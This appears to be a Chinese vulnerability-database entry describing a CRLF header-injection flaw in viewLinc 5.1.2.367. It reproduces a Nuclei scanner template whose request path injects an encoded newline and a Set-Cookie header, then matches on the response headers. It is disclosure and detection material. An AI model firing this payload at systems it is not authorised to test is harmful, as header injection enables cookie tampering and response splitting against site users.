viewlinc-crlf-injection: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack

日期: 2025-08-01 | 影响软件: viewLinc 5.1.2.367 | POC: 已公开

漏洞描述

viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned.

PoC代码[已公开]

id: viewlinc-crlf-injection

info:
  name: viewLinc 5.1.2.367 - Carriage Return Line Feed Attack
  author: geeknik
  severity: low
  description: viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned.
  reference:
    - https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
  metadata:
    max-request: 1
  tags: crlf,viewlinc,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"

    matchers-condition: or
    matchers:
      - type: word
        words:
          - "Server: viewLinc/5.1.2.367"
          - "Set-Cookie: crlfinjection=crlfinjection"
        part: header
        condition: and

      - type: word
        words:
          - "Server: viewLinc/5.1.1.50"
          - "Set-Cookie: crlfinjection=crlfinjection"
        part: header
        condition: and
# digest: 4b0a00483046022100c9977049d212eef64a8272e362ea974ba1b6df0417e71250f9cfff0e2d2a3451022100dff51ae0400f85b224312e696a156fff1817832289767a1912da0dcf0e529ed9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐